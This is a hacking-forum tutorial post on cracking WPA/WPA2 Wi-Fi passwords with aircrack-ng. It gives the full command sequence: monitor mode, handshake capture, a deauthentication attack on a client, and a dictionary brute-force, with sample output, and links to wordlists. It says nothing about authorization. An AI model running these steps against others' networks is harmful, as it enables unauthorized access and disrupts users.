••• Welcome Too www.danger-sameer.halofight.com This Website Is Created And Designed By sameer_bhola@Nimbuzz.Com •••
 
HomeCalendarFAQSearchMemberlistUsergroupsRegisterLog in
Log in
Username:
Password:
Log in automatically: 
:: I forgot my password
Search
 
 

Display results as :
 
Rechercher Advanced Search
Latest topics
» Server Bot bhola-bot4@n.c
Tue Nov 12, 2013 5:31 pm by anglina-pino

» New Ultra Ban Bot v.1.7.rar
Tue Nov 12, 2013 5:28 pm by jasmit

» BadBuzz Quiz In Chat Room version 1.5.0
Tue Nov 12, 2013 2:01 pm by Admona

» Source Member List Remover .. C#
Sun Nov 10, 2013 11:27 pm by sameer_bhola

» Load Room Captcha)Join Room(After Nimbuzz Update C#
Sun Nov 10, 2013 11:23 pm by sameer_bhola

» Free vps enjoy
Sun Nov 10, 2013 9:25 pm by readys.

» help me plz
Sat Nov 09, 2013 11:36 pm by readys.

» c*r*aCk*3r frati v1 (100% working)
Sat Nov 09, 2013 11:28 pm by alambia

» New1-Team Mini Full Massenger v1)S2a + S2o)without any adv( + Chat pv + Chat room + room manager + room Badigard( + source .. C#
Sat Nov 09, 2013 8:18 pm by tabish

тιмε ιs мσηεү
September 2017
MonTueWedThuFriSatSun
    123
45678910
11121314151617
18192021222324
252627282930 
CalendarCalendar
ฬє๒รเtє ς๏ยภtєг

hit counters
web counters
яα∂ισ ραятηεя яα∂ισ cιтү 91.1
Top posters
sameer_bhola (182)
 
tabish (141)
 
danger-sameer (60)
 
-===kalpit===- (56)
 
max-quzi (17)
 
{danger} (14)
 
rudrax (13)
 
jaanbaaz_king (13)
 
tees_maar_khan_king (11)
 
arrumat (10)
 

Share | 
 

 Cracking wpa/wpa2 networks [ part-1 : Bruteforcing through Aircrack-ng]

View previous topic View next topic Go down 
AuthorMessage
sameer_bhola
Admin
avatar

Posts : 182
Join date : 2012-07-20
Location : india

PostSubject: Cracking wpa/wpa2 networks [ part-1 : Bruteforcing through Aircrack-ng]n   Thu Jan 03, 2013 11:27 pm

Cracking wpa/wpa2 networks [ part-1 : Bruteforcing through Aircrack-ng]
Note: This is part 1 of the tutorial covering bruteforcing technique to crack wpa/wpa2 networks. Part 2 is going to cover cracking wpa/wpa2 without bruteforcing, so stay updated with our forum . The tools required for this tutorial are provided at the bottom of this tutorial.
This tutorials will teach you about cracking wpa/wpa2 networks which is using pre-shared keys. But before jumping directly to the tutorial, iguess u guys should know about WPA/WPA2 andthe difference between WEP and WPA, if u dont have any ideas on this topic, then i would suggest you to read some articles about WPA/WPA2 and WEP, thats going to help you a lot.
Before starting make sure airodump-ng shows the network having PSK authentication type, if not then stop ur time wasting cracking because aircrack-ng can only crack pre-shared keys.
I also got asked several times whether we can crack WPA like WEP and the answer i gave was NO, because while cracking WEP, stastistical method can be used to speed op cracking, but WPA only depends upon BRUTE-FORCING ( There's an exception though, which i will be showing on Part-2 of cracking wpa/wpa2 networks) .

So here is the points you should note down:

1) The passphrase or password must be in the dicitionary list u are going to use for Brute-forcing.
2) The authentication method between WPA and WPA2 networks are almost same, so there isno difference between cracking WPA and WPA2.
3) You should be close enough to the network to send and receive wireless client packets.

The steps we are going to Follow are :
Put wireless interface in monitor mode
Start airodump-ng to collect authentication Handshake.
Use aireplay-ng, to deauthenticate the wireless client, after the handshake is captured.
Crack the key using a dictionary file by running aircrack-ng.
Putting wireless interface in monitor mode
Put card in monitor mode, run the following command.
Quote:

Quote: airmon-ng
Then the system will show this,

Quote: Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0)
ath1 Atheros madwifi-ng VAP (parent: wifi0)
wlan0 Ralink 2573 USB rt73usb - [phy0]
Enter following command to start wireless card on monitor mode.(For mac drivers )
Quote: airmon-ng start wlan0
Then the system will respond,
Quote: Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0)
ath1 Atheros madwifi-ng VAP (parent: wifi0)
wlan0 Ralink 2573 USB rt73usb - [phy0]
(monitor mode enabled on mon0)
Enter following command to start wireless card on monitor mode.(For other drivers)
Quote: airmon-ng start ardha
Replace ardha with your interface name.
Now, finding network using WPA/WPA2

Here on above step, monitor mode has been enabled on mon0, note down ur monitor enabled.
Then enter Following command, (replace mon0 with ur monitor enabled)

Quote: airodump-ng mon0
The system will respond,
Quote: CH 10 ][ Elapsed: 2 mins ][ 2009-02-21 13:04 ][ WPA handshake: 00:19:5B:52:AD:F7
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:19:5B:52:AD:F7 -33 100 1338 99 0 10 54 WPA2 CCMP PSK TestNet
BSSID STATION PWR Rate Lost Packets Probe
00:19:5B:52:AD:F7 00:1C:BF:90:5B:A3 -27 54-54 0 230
In the screen above, notice the “WPA handshake: 00:19:5B:52:AD:F7” in the top right-hand corner. This means airodump-ng has successfully captured the four-way handshake.
Now, lets de-authenciate using aireplay-ng afterthe handshake is complete.

Quote: aireplay-ng -0 1 -a 00:19:5B:52:AD:F7 -c 00:1C:BF:90:5B:A3 mon0
The output should be,
Quote: 13:04:20 Sending DeAuth to station. STMAC: [00:1C:BF:90:5B:A3]
Now, lets run aircrack-ng to to crack pre-shared Key .
Quote: aircrack-ng –w mypassword.lst -b 00:19:5B:52:AD:F7 psk*.cap
Where:
-w mypassword.lst is the name of the dictionary file. Remember to specify the full path if the file is not located in the same directory.
*.cap is name of group of files containing the captured packets. Notice in this case that we used the wildcard * to include multiple files.
If everything is working good and handshakes are found, this is what u are likely to get

Quote: Opening psk-01.cap
Opening psk-02.cap
Opening psk-03.cap
Opening psk-04.cap
Read 1827 packets.
# BSSID ESSID Encryption
1 00:19:5B:52:AD:F7 testnet WPA (1 handshake)
Choosing first network as target.
If handshakes are not found then,
Quote: Opening psk-01.cap
Opening psk-02.cap
Opening psk-03.cap
Opening psk-04.cap
Read 1827 packets.
No valid WPA handshakes found.
Now , aircrack-ng will start attempting to crack the pre-shared key. Depending on ur computer speed and size of password file, cracking may take upto hours and even days.
If everything goes good then this is what cracked pre-shared key looks like:
Aircrack-ng 0.8

Quote: [00:00:00] 2 keys tested (37.20 k/s)
KEY FOUND! [ 12345678 ]
Master Key : CD 69 0D 11 8E AC AA C5 C5 EC BB 5985 7D 49 3E
B8 A6 13 C5 4A 72 82 38 ED C3 7E 2C 59 5E AB FD
Transcient Key : 06 F8 BB F3 B1 55 AE EE 1F 66 AE 51 1F F8 12 98
CE 8A 9D A0 FC ED A6 DE 70 84 BA 90 83 7E CD 40
FF 1D 41 E1 65 17 93 0E 64 32 BF 25 50 D5 4A 5E
2B 20 90 8C EA 32 15 A6 26 62 93 27 66 66 E0 71
EAPOL HMAC : 4E 27 D9 5B 00 91 53 57 88 9C 66 C8 B1 29 D1 CB
And, thats end of the Tutorial.
Download aircrack from :

[You must be registered and logged in to see this link.]
Collection of wordlist(size:8.49gb) :
[You must be registered and logged in to see this link.]
Collection of wordlist(size:1.9gb) :
[You must be registered and logged in to see this link.]
OR, you can use your own wordlists, if u already have one.
Note: This is part 1 of the tutorial covering bruteforcing techniquq to crack wpa/wpa2 networks. Part 2 is going to cover cracking wpa/wpa2 without bruteforcing, so stay updated with our Forum.
Copyright © Ardhapagal
Back to top Go down
View user profile http://danger-sameer.halofight.com
 
Cracking wpa/wpa2 networks [ part-1 : Bruteforcing through Aircrack-ng]
View previous topic View next topic Back to top 
Page 1 of 1
 Similar topics
-
» charlie the unicorn PART 4
» Nimmy Part 1: The first sort of date? Not really? [p r i v a t e--To Roxanne]
» Hey! Whats cracking.
» NFL Quarterbacks on Facebook Part 2
» Plastikente's Dark Eldar Unit Guide Part 4 - Fast Attack

Permissions in this forum:You cannot reply to topics in this forum
▀▄▀▄▀▄ sαмεεя нαcкιηg ωσяℓ∂ ▄▀▄▀▄▀ :: sρεcιαℓ нαcкιηg zσηε-
Jump to: